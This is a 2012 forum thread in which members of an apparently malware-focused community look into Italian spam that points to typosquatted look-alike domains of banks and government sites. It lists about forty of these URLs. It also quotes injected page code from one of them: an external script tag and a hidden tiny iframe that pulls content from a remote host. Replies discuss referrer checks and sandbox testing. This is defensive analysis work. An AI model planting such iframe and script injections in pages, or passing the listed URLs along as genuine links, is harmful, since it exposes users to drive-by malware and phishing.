Author Topic: Italian spam with suspicious link to malware  (Read 7223 times)

0 Members and 1 Guest are viewing this topic.

June 14, 2012, 03:15:27 am
Read 7223 times

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
The last week I received several emails with the following text

Code: [Select]
Vbcinterfree Fatto pee compiacere hn
http://mininterrno.info


Code: [Select]
Bayoutoyouemail Che cotanto riescono incomldi alla societÓ;
http://palazzochigii.com

Code: [Select]
Maddawgemail Servire Di Specchio A Qualche Femmina
Http://victorysolution.org


It is a spam hitting itallian users with different links in  mail
All the links is similar to legitimate sites IT

This is a list of active fake links in emails

Code: [Select]
    http://parlamentosenato.info
    http://allitallia.com/agenzia/roma/index.php
    http://mininterrno.info
    http://clubbviaggi.net/agenzia/roma/index07.php
    http://clubbviaggi.com/agenzia/roma/index1.php
    http://mininterrno.com
    http://easyinncontri.com/ultimaora/index.php
    http://easyinncontri.net/agenzia/roma/index07.php
    http://constriv.net/agenzia/roma/index.php
    http://esterii.com
    http://bancaditallia.com/agenzia/roma/index1.php
    http://bancaditallia.com/ultimaora/index11.php
    http://palazzochigii.com
    http://intessasanpaol.com/agenzia/roma/index11.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://myedreams.net/agenzia/roma/index07.php
    http://ultimaoranews.com/ultimaora/index07.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index.php
    http://intessasanpaol.com/ultimaora/index2.php
    http://bancosposta.it/agenzia/roma/index1.php
    http://chattta.net/ultimaora/index.php
    http://3bbmeteo.com/ultimaora/index.php
    http://movimenti.info/ultimaora/index11.php
    http://bancodiposta.com/agenzia/roma/index.php
    http://zygnaa.com/agenzia/roma/index.php
    http://ultimaoranews.com/ultimaora/index1.php
    http://biigpoint.net/agenzia/roma/index07.php
    http://hoooligano.com/agenzia/roma/index11.php
    http://movimenti.info/agenzia/roma/index07.php
    http://intessasanpaol.com/ultimaora/index.php
    http://ultimaoranews.net/ultimaora/index2.php
    http://myedreams.com/agenzia/roma/index07.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index2.php
    http://bancodinapolli.com/ultimaora/index11.php
    http://easyinncontri.com/ultimaora/index.php
    http://allitallia.com/agenzia/roma/index07.php

All links is similar to legittimate links but changing a few letters in the link text

 THE structure spam mail seems to indicate links to malware

 Examining one of the many links

Code: [Select]
http://mininterrno.info
with

Code: [Select]
<script type="text/javascript" src="http://www.cool79.com.tw/images/process.js"></script>
and

Code: [Select]
document.write('<iframe src="http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a" width="2" height="3" frameborder="0"></iframe> ')
the suspicious site

Code: [Select]
"http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a"
with IP and whois

Code: [Select]
IP Information for 178.162.241.196
IP Location: Belize Belize Belmopan Leaseweb Germany Gmbh
ASN: AS28753
Resolve Host: hosted-by.leaseweb.com
IP Address: 178.162.241.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
NetRange:       178.0.0.0 - 178.255.255.255
CIDR:           178.0.0.0/8


The

Code: [Select]
http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a
 site analysis with Wepawet,, Anubis etc. ..... dont show any type of malware even if the structure of spam suggests distributing malware

Any suggestions???

Regards

Edgar from Bangkok  ;)

June 14, 2012, 10:03:10 am
Reply #1

dlipman

  • Special Access
  • Full Member

  • Offline
  • *

  • 60
    • Multi-AV Scanning Tool
It could be the site needs a referral from from a site in the chain and you only have one chance per IP.

June 14, 2012, 11:26:25 am
Reply #2

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
I tried with different referrer, with different user agents,  with different IP (not Thai) but for the moment i not detect any malware ....
...........maybe need  'a mix of these sets ..........


Edgar

June 14, 2012, 11:31:27 am
Reply #3

dlipman

  • Special Access
  • Full Member

  • Offline
  • *

  • 60
    • Multi-AV Scanning Tool
Yeah, I tried using Malzilla with a Tor proxy with referrals as well as running 4 or 5 URLs in a SandBox.  I got nothing   :'(